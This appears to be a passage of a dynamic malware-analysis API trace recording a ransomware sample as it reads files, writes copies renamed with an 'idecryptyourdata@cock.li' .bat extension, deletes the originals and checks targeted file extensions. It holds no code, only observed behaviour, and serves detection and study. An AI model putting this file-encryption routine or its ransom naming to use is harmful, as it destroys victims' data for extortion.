(lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0047.765] lstrlenW (lpString=".1cd") returned 4 [0047.765] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.765] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0047.765] lstrlenW (lpString=".jpg") returned 4 [0047.765] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.765] lstrcmpiW (lpString1=".rtf", lpString2=".bat") returned 1 [0047.765] lstrlenW (lpString="eula.rtf") returned 8 [0047.765] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0047.766] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=6309) returned 1 [0047.766] CloseHandle (hObject=0x2cc) returned 1 [0047.766] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf")) returned 0x80 [0047.766] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.766] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0047.766] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.766] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.766] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0047.766] GetLastError () returned 0x0 [0047.766] ReadFile (in: hFile=0x2cc, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x18a5, lpOverlapped=0x0) returned 1 [0047.808] WriteFile (in: hFile=0x2c4, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x18b0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x18b0, lpOverlapped=0x0) returned 1 [0047.809] ReadFile (in: hFile=0x2cc, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.810] WriteFile (in: hFile=0x2c4, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xe4, lpOverlapped=0x0) returned 1 [0047.810] SetEndOfFile (hFile=0x2c4) returned 1 [0047.810] CloseHandle (hObject=0x2c4) returned 1 [0047.810] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.810] SetEndOfFile (hFile=0x2cc) returned 1 [0047.811] CloseHandle (hObject=0x2cc) returned 1 [0047.811] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.812] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf")) returned 1 [0047.812] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0047.812] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0047.812] lstrlenW (lpString=".doc") returned 4 [0047.812] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.812] lstrlenW (lpString=".docx") returned 5 [0047.812] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.812] lstrlenW (lpString=".pdf") returned 4 [0047.812] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.812] lstrlenW (lpString=".xls") returned 4 [0047.813] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.813] lstrlenW (lpString=".xlsx") returned 5 [0047.813] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.813] lstrlenW (lpString=".ppt") returned 4 [0047.813] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.813] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0047.813] lstrlenW (lpString=".zip") returned 4 [0047.813] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.813] lstrlenW (lpString=".rar") returned 4 [0047.813] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.813] lstrlenW (lpString=".bz2") returned 4 [0047.813] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.813] lstrlenW (lpString=".7z") returned 3 [0047.813] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.813] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0047.813] lstrlenW (lpString=".dbf") returned 4 [0047.813] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.813] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0047.813] lstrlenW (lpString=".1cd") returned 4 [0047.813] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.813] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0047.813] lstrlenW (lpString=".jpg") returned 4 [0047.813] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.813] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0047.813] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0047.813] lstrlenW (lpString=".doc") returned 4 [0047.813] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.813] lstrlenW (lpString=".docx") returned 5 [0047.813] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.814] lstrlenW (lpString=".pdf") returned 4 [0047.814] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.814] lstrlenW (lpString=".xls") returned 4 [0047.814] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.814] lstrlenW (lpString=".xlsx") returned 5 [0047.814] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.814] lstrlenW (lpString=".ppt") returned 4 [0047.814] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.814] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0047.814] lstrlenW (lpString=".zip") returned 4 [0047.814] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.814] lstrlenW (lpString=".rar") returned 4 [0047.814] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.814] lstrlenW (lpString=".bz2") returned 4 [0047.814] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.814] lstrlenW (lpString=".7z") returned 3 [0047.814] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.814] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0047.814] lstrlenW (lpString=".dbf") returned 4 [0047.814] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.814] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0047.814] lstrlenW (lpString=".1cd") returned 4 [0047.814] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.814] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0047.814] lstrlenW (lpString=".jpg") returned 4 [0047.814] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.815] lstrcmpiW (lpString1=".rtf", lpString2=".bat") returned 1 [0047.815] lstrlenW (lpString="eula.rtf") returned 8 [0047.815] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0047.815] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=3069) returned 1 [0047.815] CloseHandle (hObject=0x2cc) returned 1 [0047.815] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf")) returned 0x80 [0047.815] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.815] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0047.815] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.815] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.815] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0047.816] GetLastError () returned 0x0 [0047.816] ReadFile (in: hFile=0x2cc, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0xbfd, lpOverlapped=0x0) returned 1 [0047.983] WriteFile (in: hFile=0x2c4, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xc00, lpOverlapped=0x0) returned 1 [0047.984] ReadFile (in: hFile=0x2cc, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.984] WriteFile (in: hFile=0x2c4, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xe4, lpOverlapped=0x0) returned 1 [0047.984] SetEndOfFile (hFile=0x2c4) returned 1 [0047.984] CloseHandle (hObject=0x2c4) returned 1 [0047.985] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.985] SetEndOfFile (hFile=0x2cc) returned 1 [0047.985] CloseHandle (hObject=0x2cc) returned 1 [0047.986] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.986] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf")) returned 1 [0047.986] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0047.986] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0047.986] lstrlenW (lpString=".doc") returned 4 [0047.986] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.986] lstrlenW (lpString=".docx") returned 5 [0047.986] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.986] lstrlenW (lpString=".pdf") returned 4 [0047.986] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.986] lstrlenW (lpString=".xls") returned 4 [0047.986] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.986] lstrlenW (lpString=".xlsx") returned 5 [0047.986] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.986] lstrlenW (lpString=".ppt") returned 4 [0047.986] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.986] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0047.986] lstrlenW (lpString=".zip") returned 4 [0047.986] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.986] lstrlenW (lpString=".rar") returned 4 [0047.986] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.987] lstrlenW (lpString=".bz2") returned 4 [0047.987] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.987] lstrlenW (lpString=".7z") returned 3 [0047.987] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.987] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0047.987] lstrlenW (lpString=".dbf") returned 4 [0047.987] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.987] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0047.987] lstrlenW (lpString=".1cd") returned 4 [0047.987] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.987] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0047.987] lstrlenW (lpString=".jpg") returned 4 [0047.987] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.987] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0047.987] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0047.987] lstrlenW (lpString=".doc") returned 4 [0047.987] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.987] lstrlenW (lpString=".docx") returned 5 [0047.987] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.987] lstrlenW (lpString=".pdf") returned 4 [0047.987] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.987] lstrlenW (lpString=".xls") returned 4 [0047.987] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.987] lstrlenW (lpString=".xlsx") returned 5 [0047.987] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.987] lstrlenW (lpString=".ppt") returned 4 [0047.987] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.987] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0047.987] lstrlenW (lpString=".zip") returned 4 [0047.987] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.987] lstrlenW (lpString=".rar") returned 4 [0047.988] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.988] lstrlenW (lpString=".bz2") returned 4 [0047.988] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.988] lstrlenW (lpString=".7z") returned 3 [0047.988] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.988] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0047.988] lstrlenW (lpString=".dbf") returned 4 [0047.988] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.988] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0047.988] lstrlenW (lpString=".1cd") returned 4 [0047.988] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.988] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0047.988] lstrlenW (lpString=".jpg") returned 4 [0047.988] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.988] lstrcmpiW (lpString1=".html", lpString2=".bat") returned 1 [0047.988] lstrlenW (lpString="DHtmlHeader.html") returned 16 [0047.988] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0047.990] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=16118) returned 1 [0047.990] CloseHandle (hObject=0x2c4) returned 1 [0047.990] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html")) returned 0x80 [0047.990] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.990] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0047.990] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.990] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.990] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0047.990] GetLastError () returned 0x0 [0047.991] ReadFile (in: hFile=0x2c4, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x3ef6, lpOverlapped=0x0) returned 1 [0048.120] WriteFile (in: hFile=0x2e0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x3f00, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x3f00, lpOverlapped=0x0) returned 1 [0048.121] ReadFile (in: hFile=0x2c4, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0048.121] WriteFile (in: hFile=0x2e0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xf4, lpOverlapped=0x0) returned 1 [0048.121] SetEndOfFile (hFile=0x2e0) returned 1 [0048.122] CloseHandle (hObject=0x2e0) returned 1 [0048.123] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0048.123] SetEndOfFile (hFile=0x2c4) returned 1 [0048.124] CloseHandle (hObject=0x2c4) returned 1 [0048.124] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0048.124] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html")) returned 1 [0048.124] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0048.124] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0048.124] lstrlenW (lpString=".doc") returned 4 [0048.125] lstrcmpiW (lpString1=".doc", lpString2="html") returned -1 [0048.125] lstrlenW (lpString=".docx") returned 5 [0048.125] lstrcmpiW (lpString1=".docx", lpString2=".html") returned -1 [0048.125] lstrlenW (lpString=".pdf") returned 4 [0048.125] lstrcmpiW (lpString1=".pdf", lpString2="html") returned -1 [0048.125] lstrlenW (lpString=".xls") returned 4 [0048.125] lstrcmpiW (lpString1=".xls", lpString2="html") returned -1 [0048.125] lstrlenW (lpString=".xlsx") returned 5 [0048.125] lstrcmpiW (lpString1=".xlsx", lpString2=".html") returned 1 [0048.125] lstrlenW (lpString=".ppt") returned 4 [0048.125] lstrcmpiW (lpString1=".ppt", lpString2="html") returned -1 [0048.125] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0048.125] lstrlenW (lpString=".zip") returned 4 [0048.125] lstrcmpiW (lpString1=".zip", lpString2="html") returned -1 [0048.125] lstrlenW (lpString=".rar") returned 4 [0048.125] lstrcmpiW (lpString1=".rar", lpString2="html") returned -1 [0048.125] lstrlenW (lpString=".bz2") returned 4 [0048.125] lstrcmpiW (lpString1=".bz2", lpString2="html") returned -1 [0048.125] lstrlenW (lpString=".7z") returned 3 [0048.125] lstrcmpiW (lpString1=".7z", lpString2="tml") returned -1 [0048.125] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0048.125] lstrlenW (lpString=".dbf") returned 4 [0048.125] lstrcmpiW (lpString1=".dbf", lpString2="html") returned -1 [0048.125] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0048.125] lstrlenW (lpString=".1cd") returned 4 [0048.125] lstrcmpiW (lpString1=".1cd", lpString2="html") returned -1 [0048.125] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0048.125] lstrlenW (lpString=".jpg") returned 4 [0048.125] lstrcmpiW (lpString1=".jpg", lpString2="html") returned -1 [0048.125] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0048.126] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0048.126] lstrlenW (lpString=".doc") returned 4 [0048.126] lstrcmpiW (lpString1=".doc", lpString2="html") returned -1 [0048.126] lstrlenW (lpString=".docx") returned 5 [0048.126] lstrcmpiW (lpString1=".docx", lpString2=".html") returned -1 [0048.126] lstrlenW (lpString=".pdf") returned 4 [0048.126] lstrcmpiW (lpString1=".pdf", lpString2="html") returned -1 [0048.126] lstrlenW (lpString=".xls") returned 4 [0048.126] lstrcmpiW (lpString1=".xls", lpString2="html") returned -1 [0048.126] lstrlenW (lpString=".xlsx") returned 5 [0048.126] lstrcmpiW (lpString1=".xlsx", lpString2=".html") returned 1 [0048.126] lstrlenW (lpString=".ppt") returned 4 [0048.126] lstrcmpiW (lpString1=".ppt", lpString2="html") returned -1 [0048.126] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0048.126] lstrlenW (lpString=".zip") returned 4 [0048.126] lstrcmpiW (lpString1=".zip", lpString2="html") returned -1 [0048.126] lstrlenW (lpString=".rar") returned 4 [0048.126] lstrcmpiW (lpString1=".rar", lpString2="html") returned -1 [0048.126] lstrlenW (lpString=".bz2") returned 4 [0048.126] lstrcmpiW (lpString1=".bz2", lpString2="html") returned -1 [0048.126] lstrlenW (lpString=".7z") returned 3 [0048.126] lstrcmpiW (lpString1=".7z", lpString2="tml") returned -1 [0048.126] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0048.126] lstrlenW (lpString=".dbf") returned 4 [0048.126] lstrcmpiW (lpString1=".dbf", lpString2="html") returned -1 [0048.126] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0048.126] lstrlenW (lpString=".1cd") returned 4 [0048.126] lstrcmpiW (lpString1=".1cd", lpString2="html") returned -1 [0048.126] lstrlenW (lpString="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 38 [0048.126] lstrlenW (lpString=".jpg") returned 4 [0048.126] lstrcmpiW (lpString1=".jpg", lpString2="html") returned -1 [0048.127] lstrcmpiW (lpString1=".bmp", lpString2=".bat") returned 1 [0048.127] lstrlenW (lpString="SplashScreen.bmp") returned 16 [0048.127] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0048.127] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=41080) returned 1 [0048.127] CloseHandle (hObject=0x2c4) returned 1 [0048.127] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp")) returned 0x80 [0048.127] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0048.127] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0048.127] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0048.127] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0048.127] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0048.128] GetLastError () returned 0x0 [0048.128] ReadFile (in: hFile=0x2c4, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0xa078, lpOverlapped=0x0) returned 1 